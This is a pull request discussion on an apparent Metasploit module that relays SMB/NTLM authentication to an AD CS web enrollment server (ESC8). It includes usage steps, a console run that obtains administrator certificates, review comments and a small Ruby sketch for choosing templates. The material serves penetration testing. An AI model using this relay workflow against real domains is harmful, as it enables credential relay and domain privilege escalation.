
SMB to NTLM HTTP Relay with ESC8 module #19404

Draft
wants to merge 14 commits into master

Conversation

bwatters-r7 (Contributor) commented Aug 21, 2024

This is an implementation of the AD CS ESC8. It includes a library that uses a modified SMB capture server to repackage and forward authentication from the SMB capture server to an NTLM-authenticating HTTP server. The authenticated HTTP Client is then passed to the ESC8 module which then requests the creation of certificates and downloads them.

Verification

In one Window

  • Start msfconsole
  • use auxiliary/server/capture/esc8_relay
  • set RHOST <ADCS server>
  • set verbose true
  • run

In Another Window

  • use smb_login
  • run
  • set SMBUser <username>
  • set SMBPass <password>
  • set SMBDomain <domain>
  • set RHOST 127.0.0.1
  • run

Verify

  • Verify the capture server sees the connection
  • Verify the certificates are queried properly

To Do

  • fix srvhost to use the datastore option
  • Write documentation on setting up an ESC 8 target
  • Write documentation on using the ESC8 module
  • Fix the timeouts to use the datastore option
  • Clean up exception handling?
  • Fix stupid typo I just noticed in the Certificate Request Granted message
  • Properly implement flow control based on return values in the event something goes wrong
  • Make sure to close and reset http_client object when error states are encountered.

Example


msf6 auxiliary(server/capture/esc8_relay) > run
[*] Running module against 10.5.132.252

[*] Server is running. Listening on 127.0.0.1:445
[*] Server started.
[+] Received SMB connection on Auth Capture Server!
[*] Querying certificate templates; this may take some time
[*] Available Certificates:
[*] User
[*] EFS
[*] Administrator
[*] EFSRecovery
[*] ESC2-Template
[*] ESC3-Template1
[*] ESC3-Template2
[*] Attempting to generate certificates for all templates
[+] Certificate Request Granted using template User and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203708_default_10.5.132.252_windows.ad.cs_394098.pfx
[+] Certificate Request Granted using template EFS and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203708_default_10.5.132.252_windows.ad.cs_630242.pfx
[+] Certificate Request Granted using template Administrator and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203712_default_10.5.132.252_windows.ad.cs_381372.pfx
[+] Certificate Request Granted using template EFSRecovery and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203715_default_10.5.132.252_windows.ad.cs_013666.pfx
[+] Certificate Request Granted using template ESC2-Template and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203719_default_10.5.132.252_windows.ad.cs_601041.pfx
[+] Certificate Request Granted using template ESC3-Template1 and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203720_default_10.5.132.252_windows.ad.cs_004726.pfx
[-] Certificate Request Denied using template ESC3-Template2 and uer ADMINISTRATOR

@bwatters-r7 bwatters-r7 added the needs-docs and rn-modules (release notes for new or majorly enhanced modules) labels Aug 21, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

Comment on lines 95 to 100:

  print_bad("#{datastore['CERT_TEMPLATE']} not found in available certificates") unless datastore['CERT_TEMPLATE'].nil?
  print_status('Attempting to generate certificates for all templates')
  cert_list.each do |cert_entry|
    retrieve_cert(client_socket, cert_entry, datastore['alt_user'])
  end
end

Contributor commented:

The certificates that are issued do show up in the logs. I'm thinking it could be better to tweak this behavior. I'm wondering if we should have like three different modes

  • All - where all certificates that can be issued are issued
  • Automatic - where either the User or Machine certificate is issued based on whether the authenticated session is for a user or a machine (account ends in $)
  • Specific - where the user specified cert is issued

Defaulting to automatic might make the most sense because it'd allow the Metasploit operator to make more authentication attempts in the future with the cert and has a high probability to succeed due to using default cert templates.

bwatters-r7 (Contributor, Author) replied:

I changed this behavior as you were writing this comment. There are now two options that determine the actions:

  • QUERY_ONLY: just queries the cert list and does not try to issue a cert; defaults to false
  • QUERY_TEMPLATES: when true, it queries the templates before requesting a cert, and if the requested cert is not in the list, it will try to issue certs for every template.
  • CERT_TEMPLATE: the template to use. If QUERY_TEMPLATES is true and this is nil or does not match

Let me know if you want me to change it again. If this stays, I need to do some sanity checking so that you can't set QUERY_ONLY to true and QUERY_TEMPLATES to false. It might also be interesting to make QUERY_ONLY into an action if that would make more sense.

@smcintyre-r7 smcintyre-r7 self-assigned this Aug 22, 2024

smcintyre-r7 (Contributor) left a comment:

I left a few comments; it also looks like:

  • The mode logic still needs to be added; at least the comment hasn't been responded to or resolved
  • Shouldn't there be exception handling and logging logic added to rex/proto/smb/server.rb for the client thread?
  • Test how it handles multiple RHOSTS being provided to it to ensure it acts sensibly
  • Update the module to run passively in the background
  • Update the module to not issue the same certificate template for the same user as it has already issued
  • Add a target check to ensure the webserver is responding as expected early in the process
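
Pulling the option handling discussed in this thread together (the QUERY_ONLY/QUERY_TEMPLATES sanity check, the all/automatic/specific mode idea, and not re-issuing a template already granted to the same account), here is an added Ruby sketch that is not the module's code; the `MODE` option, `plan_cert_requests`, `OptionError` and the `issued` set are hypothetical, and the datastore option names are the ones named in the comments above:

```ruby
# Added example, not code from the pull request. Models which templates the
# module would request for one relayed account given the options discussed.
require 'set'

# Hypothetical error raised for conflicting option combinations.
class OptionError < StandardError; end

# Hypothetical planner.
#   options:   Hash with 'QUERY_ONLY', 'QUERY_TEMPLATES', 'CERT_TEMPLATE', 'MODE'
#   available: template names returned by the template query (nil if not queried)
#   account:   authenticated account name, e.g. 'alice' or 'WS01$'
#   issued:    Set of [template, account] pairs already granted
# Returns the Array of template names to request (empty when nothing to do).
def plan_cert_requests(options, available, account, issued = Set.new)
  query_only      = options.fetch('QUERY_ONLY', false)
  query_templates = options.fetch('QUERY_TEMPLATES', true)
  template        = options['CERT_TEMPLATE']
  mode            = options.fetch('MODE', 'automatic')

  # Sanity check raised in the discussion: QUERY_ONLY is meaningless without a query.
  raise OptionError, 'QUERY_ONLY requires QUERY_TEMPLATES' if query_only && !query_templates
  return [] if query_only

  wanted =
    case mode
    when 'all'
      available || []
    when 'automatic'
      # Machine accounts end in '$'; pick the default template for the account type.
      [account.end_with?('$') ? 'Machine' : 'User']
    when 'specific'
      raise OptionError, 'CERT_TEMPLATE must be set for MODE=specific' if template.nil?
      [template]
    else
      raise OptionError, "unknown MODE #{mode}"
    end

  if query_templates && available
    # Fallback described by the author: if the requested template is not in the
    # queried list, try every template instead.
    wanted = available unless (wanted - available).empty?
  end

  # Do not re-issue a template already granted to this account.
  wanted.reject { |t| issued.include?([t, account]) }
end
```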

Labels: needs-docs, rn-modules
Project status: In Progress
2 participants